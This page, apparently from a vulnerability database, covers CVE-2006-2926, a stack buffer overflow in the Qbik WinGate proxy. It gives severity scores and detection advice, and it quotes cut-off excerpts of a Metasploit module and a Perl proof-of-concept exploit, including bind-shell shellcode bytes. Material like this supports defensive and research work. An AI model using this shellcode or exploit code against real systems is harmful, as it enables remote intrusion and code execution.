CVE-2006-2926
published 2006-06-09CVE-2006-2926: Stack-based buffer overflow in the WWW Proxy Server of Qbik WinGate 6.1.1.1077 allows remote attackers to cause a denial of service and possibly execute…
PriorityP358high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
70.91%
99.3th percentile
Stack-based buffer overflow in the WWW Proxy Server of Qbik WinGate 6.1.1.1077 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long URL HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qbik | wingate | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36
- →Fingerprint vulnerable WinGate instances by checking the Server banner in HTTP responses for the specific build string. ↗
- →Detect exploitation attempts by monitoring for anomalously long URLs in HTTP POST requests directed at the proxy service on port 80. ↗
- →The exploit payload uses AlphanumMixed encoding; look for large alphanumeric-only POST request bodies (~3000 bytes) to the proxy on port 80. ↗
- →The PoC exploit sends a POST request with ~2000+ bytes of padding followed by shellcode in the URL field; detect oversized HTTP POST URLs exceeding normal thresholds. ↗
- →The bind-shell shellcode in the PoC opens LPORT 4444; monitor for unexpected outbound/inbound connections on TCP/4444 from the WinGate proxy process. ↗
- ·The Metasploit return address (0x01991932 / call esi) is specific to WinGate 6.1.1.1077 only; the PoC return address (0x014f9e4b / JMP ESI) targets Win2k SP4 German specifically — detections based on these values will not generalise to other OS/build combinations. ↗
- ·The exploit payload space is limited to 1000 bytes and bad characters include null bytes, whitespace, and several URL-special characters, meaning real-world payloads must be alphanumeric-encoded. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2006-2926 QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)
---
##
# $Id: qbik_wingate_wwwproxy.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Qbik WinGate WWW Proxy Server URL Processing Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Qbik WinGate version
6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the
HTTP proxy service on port 80, a remote attacker could overflow
a buffer and execute arbitrary code.
},
'Author' => 'patrick',
'License' => MSF
Exploit-DB
QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
exploitdb·2006-06-07
CVE-2006-2926 QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow
---
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;
if ($ARGV[0] eq "")
{
print "param1 = remote host";
exit;
}
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f
Metasploit
Qbik WinGate WWW Proxy Server URL Processing Overflow
metasploit
Qbik WinGate WWW Proxy Server URL Processing Overflow
Qbik WinGate WWW Proxy Server URL Processing Overflow
This module exploits a stack buffer overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046646.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046649.htmlhttp://secunia.com/advisories/20483http://securitytracker.com/id?1016239http://www.securityfocus.com/bid/18312http://www.vupen.com/english/advisories/2006/2182https://exchange.xforce.ibmcloud.com/vulnerabilities/26970http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046646.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046649.htmlhttp://secunia.com/advisories/20483http://securitytracker.com/id?1016239http://www.securityfocus.com/bid/18312http://www.vupen.com/english/advisories/2006/2182https://exchange.xforce.ibmcloud.com/vulnerabilities/26970
2006-06-09
Published